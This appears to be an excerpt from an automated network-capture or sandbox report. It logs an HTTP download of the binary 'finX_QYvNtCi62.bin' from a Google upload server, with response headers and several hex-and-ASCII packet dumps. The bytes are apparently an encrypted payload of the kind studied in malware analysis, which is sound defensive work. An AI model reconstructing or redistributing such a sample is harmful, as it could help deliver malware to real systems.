X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="finX_QYvNtCi62.bin";filename*=UTF-8''finX_QYvNtCi62.bin Content-Length: 221760 Date: Wed, 01 Dec 2021 18:10:27 GMT Expires: Wed, 01 Dec 2021 18:10:27 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=cNsAng== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-01 18:10:27 UTC	6	IN	Data Raw: b0 29 df 50 71 9f 86 cc 54 db 32 48 13 ad 7e 74 3f 95 0e 7a 75 b8 b6 a3 14 98 64 b2 ee f6 8c 91 c0 eb ce 98 dc e6 9a 95 60 6a c7 14 93 21 ba 1c eb 6e 17 6c 25 86 38 9c 02 9e 8c f8 88 76 32 b6 21 a9 ba 89 37 6d b9 b8 cb e8 db 01 54 fc 90 73 67 d0 a2 3c e2 ac 3f 9d 37 36 e0 4f c9 7c aa ee 2f d3 fc ca b9 50 ae 28 22 7e 9a 13 de 2a ec 96 51 b4 b2 7e 85 02 1e c5 a4 7c d8 c1 4d 01 8b f7 c5 79 c7 79 bc b4 e2 28 69 9b ea 1c b9 9d 00 0a 72 a6 54 47 3f 03 b6 cd 86 62 93 ac 40 fe 56 44 2f 72 f0 ed 59 c5 77 c2 c4 85 e9 37 36 67 eb 8f d8 18 fd 15 c3 7a 34 99 88 dc c0 3f 91 21 4c 82 21 bd f4 ef b1 bb cc cc 2a 78 a8 ea 54 ea 1b 41 a5 67 07 ad b8 87 f9 47 43 64 bf 2e 85 fd 41 5d 60 ca 1c df 8d a8 f9 d8 94 87 95 0f c9 a4 48 e3 57 f5 5b 99 4d dc a9 7b b1 ee 32 ab f3 a8 1b Data Ascii: )PqT2H~t?zud`j!nl%8v2!7mTsg<?76O\|/P("~Q~\|Myy(irTG?b@VD/rYw76gz4?!L!xTAgGCd.A]`HW[M{2
2021-12-01 18:10:27 UTC	9	IN	Data Raw: ea 8e 78 25 28 b8 a5 69 a9 93 78 c1 71 31 fc fb dc c0 35 4d 09 62 80 71 fe fe 31 ef 92 f8 cc e2 d1 23 a5 56 ea 1d 4b 8d 5f 07 ad 52 59 fb 40 62 65 b4 2e 84 8d 42 5d 62 c2 65 df 9b 27 f9 d2 ca f1 96 0f cb 84 11 e3 15 6e 5b 93 4d dc e9 7b b1 ce 32 ab 5e 07 1b 90 d4 01 b1 8c 62 e1 42 6d b6 a5 7f fe 4c 85 5d e4 f4 a0 09 ea 83 53 47 92 69 50 bd be bf be c4 db 72 17 5d 94 4f 59 a1 86 43 f3 38 1b 8a 74 21 c9 57 b8 64 e1 10 5d ec 43 78 04 f2 f5 c7 21 f4 09 f8 ae 2a fc ec 7c 0d aa ad ce 31 b4 ac 42 e4 94 eb 9d d4 bf bb 59 56 2d 70 f3 62 29 f6 7c 8f 6d c7 75 23 bd f8 39 cd dc 82 52 49 af ee cd 1f c4 79 5d c8 bd 64 bc 8c fd 56 c7 69 a9 1c 49 b0 7a be a6 9e 65 48 b9 e7 76 47 1e aa 7e 83 0a 6e e3 48 8f 0b 25 18 f2 16 54 9e 39 4e dc 31 05 37 04 69 19 17 43 bf 32 f1 22 Data Ascii: x%(ixq15Mbq1#VK_RY@be.B]be'n[M{2^bBmL]SGiPr]OYC8t!Wd]Cx!*\|1BYV-pb)\|mu#9RIy]dViIzeHvG~nH%T9N17iC2"
2021-12-01 18:10:27 UTC	13	IN	Data Raw: de bf fc 8e 54 2d 7c f3 52 29 f6 7c 2b 1d 9b 66 27 b7 e2 3a a2 18 83 7e 43 c9 a5 b3 07 ce 51 17 68 a1 71 ae a4 c2 52 df 9d be 70 c9 af 68 33 b4 f1 31 49 b4 f4 69 44 71 e3 7a 95 fe d8 d8 9d 15 33 21 18 e2 1f 48 9e df 3c a9 33 2e 38 2f 85 f3 fb b9 ae 5f ef 34 b0 05 59 26 7c 8a d1 58 3f 61 97 ea 14 6b 29 ff a4 45 a2 27 9e 20 83 2c bf 0f 60 52 0e c9 1b d1 27 b0 a5 90 84 55 87 08 5d 72 8d d4 c1 d6 d9 b8 87 7a a9 f9 fb 0d 87 56 60 cd d5 87 d7 c0 fd 3f 68 81 aa 74 b0 38 22 d6 5c ce 20 1f e1 02 0a bd 26 77 5f bc 8a 4a b6 a7 55 94 cd f4 2d ac b6 c7 17 b3 fc 20 76 3a ec f9 42 32 b6 aa 00 ee 56 ec f7 8b 47 04 fa a5 2a 2d 3b 37 9c 47 d8 74 4f db 1f 9d f5 8a 4c 10 41 64 f3 d5 fe 1a 5d e9 ac 5e d8 25 32 26 59 2b 18 cb c9 4a 16 30 12 c3 9b bb 0e 83 02 3c 1b a4 6f 16 eb Data Ascii: T-\|R)\|+f':~CQhqRph31IiDqz3!H<3.8/_4Y&\|X?ak)E' ,`R'U]rzV`?ht8"\ &w_JU- v:B2VG*-;7GtOLAd]^%2&Y+J0<o
2021-12-01 18:10:27 UTC	17	IN	Data Raw: 94 30 42 a9 ab f1 ef cd f4 26 97 06 d6 3c 91 88 57 74 3c f9 f8 f1 89 b4 a0 2e 87 7d c4 4d a1 dc 02 d2 88 02 08 31 1f c8 6f 43 72 5c fb 1f 65 f5 8a 4c 29 f3 4c 4d dd d6 3a 75 ce a6 76 49 0d 6c 2c 46 27 87 b8 e1 f7 15 18 8f d2 b2 99 99 f8 00 3a 35 ab f4 16 e1 00 91 07 1d b8 d6 eb d6 ba 71 5b 20 c6 8e 66 c4 b1 ee 2f 87 30 30 96 48 c2 1a 50 12 ab 18 99 7e 11 c8 0d 77 67 e4 50 6e 1f ba d0 45 42 25 7c fa 09 b0 c3 8a 5a 21 2d 68 8a 0b eb 71 35 07 ae b3 7f 5e 0a ab ae 04 25 68 61 0e 98 fc e7 10 30 5d c2 0b 66 15 50 32 1c a1 02 80 81 c8 85 71 d9 28 30 0a 76 89 c3 ae 4f a0 c6 dd f9 aa 95 bb 1d 9d 57 14 c9 50 75 50 82 c1 55 8c 96 45 2d dc 7c ed 44 80 0f 78 b7 63 4f de 6c 0b 8a b9 69 bd 53 a1 97 09 71 bc d1 94 4e c2 73 46 73 9f f6 ba d8 40 0f 27 72 77 31 c0 e9 6e 00 Data Ascii: 0B&<Wt<.}M1oCr\eL)LM:uvIl,F':5q[ f/00HP~wgPnEB%\|Z!-hq5^%ha0]fP2q(0vOWPuPUE-\|DxcOliSqNsFs@'rw1n
2021-12-01 18:10:27 UTC	18	IN	Data Raw: 6b 4a 59 37 cc a0 55 94 b2 03 2e 19 33 0f 37 bf b7 37 b6 80 60 d8 cb 22 8c b3 9a 42 4c ef ce d5 be 9a 88 62 bc 6c f3 54 87 34 6d bd af fc d5 f3 c1 a9 03 96 5b f5 d0 a2 3a ca 84 3f 9d 71 27 e7 20 1b 7c aa e4 07 f7 fc ca b3 44 b8 00 10 7e 9a 15 f8 f7 d6 97 51 b4 97 56 b2 02 1e cf b7 41 cc d2 ca 29 b3 f7 cb 6c a0 52 bd 00 eb 9b 46 23 eb 54 6c fc c8 62 1b d5 6f ba 58 6c d1 be f4 4f a2 8f 37 b8 f7 29 5b 54 30 99 39 a0 7c bb e4 ec 83 3f 37 2a b8 a9 9d 20 9b 70 eb 18 41 93 ac d6 62 2e d1 39 64 da 73 f8 f2 4d ec fa d6 e4 9b db 0b 81 47 a8 09 03 db 71 07 ad 5c af 81 46 48 6f 16 3f c5 bf 6a 3b 62 c2 1a 7d 9c e8 d1 a3 ca f1 9c 27 ae 86 48 e5 7f dd 5b 99 4b cd ee 14 63 ce 32 a1 db 7a 19 82 c8 29 9f 8f 79 d7 28 15 a1 a4 75 d6 31 87 5d f3 de f4 40 ea 89 71 1d a1 69 56 Data Ascii: kJY7U.377`"BLblT4m[:?q' \|D~QVA)lRF#TlboXlO7)[T09\|?7* pAb.9dsMGq\FHo?j;b}'H[Kc2z)y(u1]@qiV
2021-12-01 18:10:27 UTC	19	IN	Data Raw: 1b 6a 29 f1 ac 45 a2 1f 8f 2b a8 38 bf 08 77 b6 0f e5 18 c9 2c b0 a2 be 7d 54 ab 04 4a 79 8d 95 de 28 d8 9b 85 51 ab c8 18 25 f3 54 60 cb d7 fa 4b c0 fd 3b 42 f7 a8 17 bf 10 b9 d9 5c c4 3f 0f 6d 5d 0b bd 27 5f c4 ce 83 40 a9 a3 d9 cb cd 74 25 84 2d c8 17 b9 d4 4d 74 3a eb d1 d9 32 b6 2f 21 96 54 e2 f1 a3 dc 99 f3 af 02 07 3b 37 96 75 43 74 4e d1 37 d8 f7 26 43 38 da 6a f3 df d6 86 54 e9 a6 79 43 25 32 36 46 21 95 94 c9 4a 17 d1 80 c3 9b bf 26 fa 00 eb 14 8c f4 19 eb 28 cf 1d 1d be c4 c5 fe 07 73 bd 2f d7 a7 40 04 b3 ee dd a6 17 30 99 42 ea 44 4a 12 ad 0a b4 56 ac ca 0e 7b 76 cd 76 3c 1d ba c7 67 65 25 73 f0 21 ee d9 8a 5c 33 05 40 4b 09 cb 7d 39 16 8a a0 76 4f 0a ab bf 29 39 6e 70 07 ed 35 e7 11 3a 4a 3c 09 53 70 99 32 0f ab 15 7e d3 a2 83 1e 1f 28 30 00 Data Ascii: j)E+8w,}TJy(Q%T`K;B\?m]'_@t%-Mt:2/!T;7uCtN7&C8jTyC%26F!J&(s/@0BDJV{vv<ge%s!\3@K}9vO)9np5:J<Sp2~(0
2021-12-01 18:10:27 UTC	20	IN	Data Raw: 30 86 66 78 8c a1 1f 51 be 2b c1 d3 e4 dc 13 75 1b 17 6f c0 90 63 de 33 7a 70 5f 97 84 57 42 42 a7 da 8c 0f 6a 83 b9 45 94 a6 81 c6 1e 82 03 cb 77 63 38 b9 f5 f6 1f e6 97 85 88 d2 da ff 18 42 52 d5 db 84 be 44 0a 19 4c bf b8 ff b6 55 1b 27 c8 33 7e 5b 97 f7 e6 c6 17 1f 08 25 d8 7a 3c aa 99 b8 c9 dd 49 47 4d 9b 64 26 30 c2 cf a7 87 b6 1e b9 74 0d 2b a5 3d 45 8a b8 cf e2 d6 18 b8 07 90 62 db ca 5c 3d ce a9 14 cf 6c 25 e4 4f d8 78 b6 10 2e ff ed cd d6 3d ae 28 28 7c f5 e3 de 2a e6 ba 64 a9 a1 7a 85 13 1a d8 5a 7d f4 c4 da 2b 95 e4 cf 66 6c 73 ab fe ea c9 4b 3b f8 54 74 ad 50 74 e5 d4 58 34 5a 7f d5 bf f6 0b ad 31 20 bc 3a 00 5e 6a e9 77 86 48 0a bb 32 e0 8f 1e fc 9f 87 d9 4a 88 66 66 c7 6c 09 97 ac 5b c2 3f 91 09 4c 82 60 d0 2d ed fd bc c5 bf 3c da 0b 8d 47 Data Ascii: 0fxQ+uoc3zp_WBBjEwc8BRDLU'3~[%z<IGMd&0t+=Eb\=l%Ox.=((\|*dzZ}+flsK;TtPtX4Z1 :^jwH2Jffl[?L`-<G
2021-12-01 18:10:27 UTC	22	IN	Data Raw: 18 83 7e 5b c6 95 2e 1d ce 57 3b 2e bf 62 ac cb ab 56 c7 69 b5 46 ce b0 72 a2 5f f0 1d 5b bf c5 be 42 71 f4 56 6a 02 d9 f2 f1 7a 20 25 12 f9 06 5b 86 29 22 8a cf 04 11 10 6a 14 02 e4 b6 31 fa 34 b8 1e 61 fc 7d a6 d0 75 37 2f 8c ea 1c 6e 8b e0 bd 49 a2 3e 90 d5 a9 1b ad 20 73 ac 0f e3 76 34 2c b0 a8 e9 84 54 ab 00 40 60 81 d3 d1 37 d3 6a 84 7d a0 d5 0e 5b fa 54 60 cf 75 b0 40 cc fd 3d 56 09 a9 58 b4 07 b5 d6 54 db 2d eb 6c 71 08 96 22 67 b7 42 75 bf 83 ad d9 cb d6 c4 28 84 e6 c7 17 b9 fe 57 74 2b e8 f9 26 32 b6 aa 47 a2 54 ec fb cc e9 04 fa a5 08 d5 88 37 96 6f 66 5c 78 d1 37 d2 fb 88 62 c7 da 64 f9 cc d2 1c 5d ed a6 76 ce 5e 32 2c 47 2c 44 e8 c9 4a 16 30 9d c3 9b bb 0e fa 01 3c 17 85 7a a1 33 90 dc 02 0b b5 d4 c1 91 06 72 5b 2c de b6 4b 16 b2 c6 68 af 17 Data Ascii: ~[.W;.bViFr_[BqVjz %[)"j14a}u7/nI> sv4,T@`7j}[T`u@=VXT-lq"gBu(Wt+&2GT7of\x7bd]v^2,G,DJ0<z3r[,Kh
2021-12-01 18:10:27 UTC	23	IN	Data Raw: da 14 26 73 d3 97 85 e9 ab 90 1e 4c 26 9c 47 14 0d 4d f8 7d 2c ce cf 3a cb 58 19 af fb cf 41 f1 95 84 b0 4b 39 d5 df 98 13 f8 77 70 a7 70 e5 30 86 6a 29 da 85 2f da e6 61 6e 55 ac a8 2b fa b6 58 db 2c 39 b8 41 e9 62 ce 5a d1 fc b2 19 84 6d 7a e9 7e e1 50 98 7e ee 23 fb d7 02 76 1b 17 6f c0 85 1e ea 01 58 6d 7c 68 83 40 b6 2c e6 d8 94 0e 60 9d bc bf 95 9b 87 c6 eb 83 28 d6 91 71 10 bb cf f7 31 67 69 56 74 c3 e3 fb 18 40 66 ca 25 19 92 46 21 3b 74 d6 56 16 5a 59 34 71 c4 3b 77 6a 1b e5 d7 38 16 33 14 1c d4 e0 b4 b1 8a bc e6 cc 4d 4f 9b d2 48 23 20 4e f5 b4 83 b2 71 99 6c f3 2e a5 0a 13 9a b8 cf ec cc 32 b3 7d b5 73 df d4 2c 8b f4 9d 13 b5 3d 36 e0 49 e4 79 77 bd 28 d3 fc e1 a7 2e 8d 28 22 7a 82 20 c8 54 c9 96 51 b0 3c c9 93 33 12 ed ef 7c d8 c7 e0 04 56 c4 Data Ascii: &sL&GM},:XAK9wpp0j)/anU+X,9AbZmz~P~#voXm\|h@,`(q1giVt@f%F!;tVZY4q;wj83MOH# Nql.2}s,=6Iyw(.("z TQ<3\|V
2021-12-01 18:10:27 UTC	24	IN	Data Raw: 94 be ba 96 88 f3 56 1d 32 d5 cf 51 ab 80 50 41 7d 18 8a 7e 25 f6 00 c5 7d 9f 77 10 ec 47 5a 09 e6 9a 8f 09 d0 03 fe bb 98 9b a3 7c 09 7d 40 e4 7d b6 ae 5b f3 f7 f2 e3 d6 b9 93 10 7c 21 75 9c 35 01 d2 76 89 08 15 7d 23 b7 f7 e3 74 e4 82 52 4a df c4 fe 06 b0 59 13 ca b9 4a a7 a7 d3 50 ef 47 bf 5c c8 30 72 be a1 f5 ec e7 bb ed 7a 42 6e 88 4d 9a 7e d1 f4 9e 06 08 2b 1b f3 1d 7f a2 21 3d 8f b1 0d 3d 17 69 d3 95 44 a9 21 f4 2b cb 32 68 7c 74 8a db 76 04 5e 96 ea 1a 42 0d ff ac 4f 22 3e 88 2b ac ea cc 0a 77 ac 0d fa 39 fa 35 ce aa 86 7a 50 83 50 48 79 8b fb fd 28 d8 9e 05 59 ab d2 1c f8 a7 56 60 cb ff ab 4c c0 fb 5a 49 f6 a8 7e d9 1b b8 d6 56 ec 3b 15 6d 5b 65 b4 26 5f ce d3 80 41 a9 a7 cf 35 cc ab 2e 9b 3f 39 16 af 2a 56 2b 38 ca 75 d9 32 b6 5e 29 80 aa ed ae Data Ascii: V2QPA}~%}wGZ\|}@}[\|!u5v}#tRJYJPG\0rzBnM~+!==iD!+2h\|tv^BO">+w95zPPHy(YV`LZI~V;m[e&_A5.?9*V+8u2^)
2021-12-01 18:10:27 UTC	26	IN	Data Raw: 70 6c de ed a0 a7 85 01 d1 bb 9e ac e9 9d 19 26 ee 41 1a 45 fd cf 5f 9f 9d 36 18 0d 65 ed 53 b3 da 73 49 68 23 50 46 14 86 bb 77 95 29 b8 88 19 a7 7e ff 9a 4a c9 f5 7b 67 9e f7 a3 8b 43 50 26 49 a8 33 d1 f4 79 10 d5 1a ff 0d 2b 16 d1 0b 1f 60 d9 93 8d 0c b5 82 ef 5b 74 b5 44 44 0f ac 59 6b f6 c9 dc 1f cb 47 19 af e4 ca 8e 0e b8 a0 99 3e 28 de ce 86 16 ed 71 49 b4 6d 1b 3b b5 5d 2d eb 98 2d c5 f9 5c 94 4f 7e bc 2f f0 b1 37 d6 2f 28 b9 2e d4 0d db 5f d9 6c b7 26 b5 40 69 f8 68 0e 4a ab 25 0c 31 d3 d9 11 63 08 c1 7a ed 96 6a db 12 47 70 47 8c 83 51 a7 5c a6 26 95 28 61 95 a4 aa 8d 5c 90 da 0a ac 17 ce 89 73 0f a4 cf 0d 26 b5 62 6b 7c ce 26 ec 13 4e 70 c4 c0 18 af 5f 15 05 b2 be 85 e2 a3 56 4c 81 ca 33 78 44 ba e0 e6 38 07 28 10 1e 2e e1 1b bd 9b b7 d8 ca 9b Data Ascii: pl&AE_6eSsIh#PFw)~J{gCP&I3y+`[tDDYkG>(qIm;]--\O~/7/(._l&@ihJ%1czjGpGQ\&(a\s&bk\|&Np_VL3xD8(.
2021-12-01 18:10:27 UTC	27	IN	Data Raw: e5 01 97 b6 68 16 bc 4f 5d ec 90 c5 4e b4 2e 84 b6 52 5f 71 cd 0d cf 9b b9 e8 f0 dd f0 96 05 d8 8b 59 f2 81 e6 54 9b 5c d3 c1 63 b0 ce 38 b8 fd bb 14 98 df 0f 67 5b 6a de 45 7c ae 8c 67 ff 59 8f 51 e4 f9 92 96 f9 8c 5b 22 ae 41 48 bd b4 b3 9b 9f d4 68 cb 21 d0 4d 48 a4 a8 4c 9d 74 11 99 73 36 e6 6d e7 69 37 a9 03 e3 41 63 0d cd 82 88 21 fe 10 fb a0 17 89 75 6f 02 b1 ae f1 a7 a1 7a c9 a0 c4 eb 9c cd bd 91 05 5b 3c 72 8a 22 2c de 61 88 02 9f 76 32 bb 9c 22 b8 e6 88 6b 64 c1 bd cd 17 ee 5f 93 ca bd 22 35 a4 d3 56 c4 72 b3 33 df b1 7a b4 ce ef 30 48 b3 c5 28 40 71 f4 6d 97 11 cd e5 8e 0a 08 75 18 f3 1d 44 94 26 51 a6 31 05 3d 17 6d 0e 24 06 f2 02 f6 34 b0 01 71 02 8c b5 82 5a bd 51 95 e0 ab 7d ff 72 87 45 a2 37 9b 38 b9 25 ae 1b 70 c0 2c e5 19 c9 2c b0 a2 a6 Data Ascii: hO]N.R_qYT\c8g[jE\|gYQ["AHh!MHLts6mi7Ac!uoz[<r",av2"kd_"5Vr3z0H(@qmuD&Q1=m$4qZQ}rE78%p,,
2021-12-01 18:10:27 UTC	28	IN	Data Raw: 3a 85 46 c2 55 51 12 a7 09 db ce ac ca 07 62 73 e5 69 3d 1d b0 c7 69 0a bd 7c f0 2b fd c5 9b 5a 26 2d c1 49 09 ed 61 b4 11 84 a0 77 5b 30 b5 97 8a 36 6e 7a 1f 7b 0a e7 10 3b 62 0f 08 6e 70 8e be 23 ab 15 7f ab 03 83 1e 1a 00 6a 00 61 7d d6 27 d3 8d a9 14 f8 b9 98 bd e5 8b 20 34 fc 51 73 48 71 c8 55 8c 93 3a 0e 0f 75 fb 53 af 67 69 bc 7e 19 d9 53 0b 8a a9 ce 84 33 b0 9b 1e 55 6b c7 8c c5 f7 fe 53 72 8c fa b8 95 47 58 ad 4b be 24 d6 73 77 25 3c 33 74 0a 3a 06 fc 05 2b 65 52 bf 83 06 a6 aa 8b 72 49 b9 47 1e d9 d1 4f 6a ed eb d7 20 d8 56 31 8a fe d5 b5 84 ab 8c 88 27 2a d2 ce 84 11 fb f9 d6 bb b6 0d ad d9 4a 3f f0 92 2f d6 f7 78 7e 66 48 aa 07 e7 a7 ba db 2d 39 b3 2c c0 73 c2 48 c8 63 8c 20 aa 6d 70 41 79 13 42 bf 2c f9 24 eb c0 9e 5d 03 e9 6f ff 9b 71 c5 17 Data Ascii: :FUQbsi=i\|+Z&-Iaw[06nz{;bnp#ja}' 4QsHqU:uSgi~S3UkSrGXK$sw%<3t:+eRrIGOj V1'*J?/x~fH-9,sHc mpAyB,$]oq
2021-12-01 18:10:27 UTC	29	IN	Data Raw: cb 26 bb 77 bc 00 98 c3 49 23 e1 43 56 a2 d9 49 1b d5 75 24 6e 73 c9 32 cc 0f b3 ce 32 b4 29 2e 44 4a 83 ab 6f a9 2a bb e5 ec 8d 06 77 3e a9 8b a3 68 81 58 fa 76 39 99 bd fe d1 1b fe 06 4d 82 7b e9 d6 fe de d5 e7 cd e2 d1 1a a9 43 85 32 40 a5 6d 16 8f 41 e8 d1 47 48 6f a5 0c ea 8e 43 5d 6a d3 18 c9 9c ac 77 6f a5 dd 97 0f c3 97 6d fc 17 78 70 99 4d dd fa 5a a0 eb 2d 83 e2 8b 0d 9d 8e 29 a6 8c 79 db 34 48 a0 a4 75 ed 7f 94 7b e4 d7 e7 62 eb 83 53 20 86 78 77 94 a7 b8 96 84 f3 25 1f 32 d9 67 77 a9 80 52 f3 0c 1b 8a 74 34 c1 70 e7 62 f0 57 7f d6 42 72 08 3b 96 98 07 d8 04 ef 97 77 c4 a3 7c 07 7c ac ec a3 af ab 4e 55 d1 ec 97 00 a8 b6 3c 63 2d 76 96 20 00 de 4e 89 02 9f ab 23 b0 d9 38 93 a7 fe 52 48 c2 bd cd 1f 7a 51 13 ca 9c 62 aa a4 06 56 c7 63 ae 5c c2 b0 Data Ascii: &wI#CVIu$ns22).DJo*w>hXv9M{C2@mAGHoC]jwomxpMZ-)y4Hu{bS xw%2gwRt4pbWBr;w\|\|NU<c-v N#8RHzQbVc\
2021-12-01 18:10:27 UTC	31	IN	Data Raw: a3 dc 0e d2 b3 01 08 3d 2c 1b 68 43 74 4e c2 3c c9 fc 9c 4d 10 cb 64 f3 d5 74 2d 56 fe b9 4a cf 1a 32 2c 47 83 85 9f d1 5b 13 30 98 c3 9b bb 84 eb 0b 25 0b 00 cb 16 eb 29 6d 16 16 a4 d4 c1 ed 0a 62 56 32 ff 26 4c 04 b5 f8 a4 a8 17 30 97 56 fe 50 78 b1 ad 0b be 7e bd ca 0d 7b d4 dc 73 2f 17 ab dc 79 71 3e f1 df 21 ee c2 99 50 23 09 56 5c 95 fa 7b 2e 00 18 b1 7a 57 33 3d ae 25 2f 78 ec 16 fb 2f f0 8c 2b 46 2b 21 c9 7a 99 38 3a b4 01 6d 8c a8 92 11 09 d6 31 2c 6b 75 e9 ce 5f a6 a3 1f e3 b9 90 ac f2 90 17 23 01 50 59 5e ed c5 43 16 ba 38 05 1e 74 e6 5d a7 d6 77 b7 78 00 4a 66 f5 8b 84 61 87 3e b2 90 27 43 7e d3 9e 57 d3 ed 5c 73 8e f8 b6 83 af 4e 1d 71 b1 1b f0 ee 66 22 22 33 4f 0a 3a 06 cb 12 24 5b 82 92 9c 1d a8 94 51 5b 58 b3 56 1c 21 67 4f 6a fc b0 b7 21 Data Ascii: =,hCtN<Mdt-VJ2,G[0%)mbV2&L0VPx~{s/yq>!P#V\{.zW3=%/x/+F+!z8:m1,ku_#PY^C8t]wxJfa>'C~W\sNqf""3O:$[Q[XV!gOj!
2021-12-01 18:10:27 UTC	32	IN	Data Raw: 53 b3 93 52 dd 27 e2 d1 9f bf ad 02 bd 65 e8 d4 88 18 67 bb bd 85 79 c4 0b 98 18 8c 7e df d9 b4 c2 e3 80 3d 8a 7a 36 e9 50 c0 82 ab c2 2d f8 fe e1 3d 47 a5 03 28 7c 9f 59 4f 35 e1 b8 53 a2 b9 7b a0 48 09 13 f0 79 92 c9 fc c9 9d dd cb 66 6e 47 be 00 d6 e5 48 23 a8 50 74 ad 42 6e 30 fa 74 3f 55 92 d0 93 ea 71 84 cf 21 94 4b 60 5a 52 98 83 60 bb 02 a4 f3 12 86 3b 70 30 b4 af bd 61 67 71 c1 75 2e 9f ac d4 d9 c1 90 0d 4e a9 73 d3 3b e8 ff d5 83 cd e2 d1 21 8b 54 ea 08 71 a7 67 52 ad 58 87 bf 46 48 74 a2 22 ae e8 42 55 7a 3c 1d f3 80 af 96 95 cb f1 9c 17 fa bb 5f c9 4c f9 5b 91 54 22 e8 57 b5 d7 18 b1 ff aa 13 95 30 00 9d 8f 61 dd 47 65 b9 5a 7e d2 55 87 4f f4 de c6 41 ea 89 74 fd b8 65 50 b4 a2 47 97 a2 d9 65 11 32 d7 54 a7 aa ac 56 b7 76 30 3b 64 0d e9 77 f6 Data Ascii: SR'egy~=z6P-=G(\|YO5S{HyfnGH#PtBn0t?Uq!K`ZR`;p0agqu.Ns;!TqgRXFHt"BUz<_L[T"W0aGeZ~UOAtePGe2TVv0;dw
2021-12-01 18:10:27 UTC	33	IN	Data Raw: 7e da 1c 22 5d 78 8d d9 f2 23 f0 ba 87 51 ad a1 4e 24 f2 5e 1a d7 d0 79 5b 1a ea e3 cd dc a8 74 b7 1d b0 c0 47 58 36 02 6f e9 96 b4 3e 5c 70 20 8c 56 a0 b7 de e3 da f5 2c 8e 24 ce 99 0e cc 8d 71 56 c9 d1 d9 32 b6 a0 28 e6 14 b7 d9 32 dc 04 f0 1b 9e 01 32 b9 21 78 99 71 6f d1 36 d8 f7 d7 fe a4 d3 4e f3 df d6 2f 6d ec a6 ff 43 25 32 64 46 21 85 bc 5e 4a 17 12 8b ac 03 b1 26 f0 0d 35 93 3b d4 e9 eb 28 cf 36 16 96 e4 c6 fe 01 00 0c 27 d7 ad 34 2c 24 ee 29 a5 14 5f 0e 42 ea 4e 5c 1a 23 bc 94 a9 ac ca 0d 40 7d e5 59 3f 1d bc a5 3a 64 25 76 8a 38 e7 4d 3d 8a 3a 8b f7 9d 1e 31 60 ef 9b af a0 76 4e 2e a7 a9 3e aa 68 67 0e 79 82 53 8c 33 5c 3a 11 67 f4 2e 1a 0b aa 15 74 85 b0 8a 90 a7 fe 38 8e d6 c3 5d f9 48 a0 b0 1d 77 1d 49 a4 6d 28 20 3a fe 51 7f 56 d6 d1 57 a4 Data Ascii: ~"]x#QN$^y[tGX6o>\p V,$qV2(22!xqo6N/mC%2dF!^J&5;(6'4,$)_BN\#@}Y?:d%v8M=:1`vN.>hgyS3\:g.t8]HwIm( :QVW
2021-12-01 18:10:27 UTC	34	IN	Data Raw: 7b 48 b5 76 f6 6e 8e 22 11 ec 49 61 16 ce d3 98 35 9b c1 fe b1 12 bb 3f 7c 0d aa b8 ea 6c b0 ab 52 8c 4a 5c f2 77 b9 93 1e 5c 3c 7a 92 36 38 fa 19 d7 03 95 7f 0b e8 f2 3e b3 f5 88 7a df c0 bd c7 0e c4 3e 8b ca bd 68 b9 af c2 50 d6 68 a9 4d c9 3e cd d1 08 f1 31 42 a8 f9 15 87 71 f2 74 ae ae 07 e2 8f 16 55 1e 18 f3 1a 7b 8a 30 29 f0 0a 05 3d 16 02 59 04 46 a3 fd e7 32 b7 17 76 8c cb e5 72 72 2c 5b bd db 1f 6a 2f ec a9 54 a7 33 8b 25 ac 1f df 09 77 a6 02 cd 8e c9 2c ba ab e9 e2 54 ab 00 59 7d 9c d5 c8 2c ce 85 81 df 1c bd b1 25 f2 5e 71 cd d3 b9 48 4e 4a 5a e9 f7 a8 7e 9e 4b b8 d6 56 ec 12 16 6d 5b 0c 95 15 5c c4 ba a2 67 a9 ad d3 a4 55 f4 2c 8e 3e c0 06 bf c5 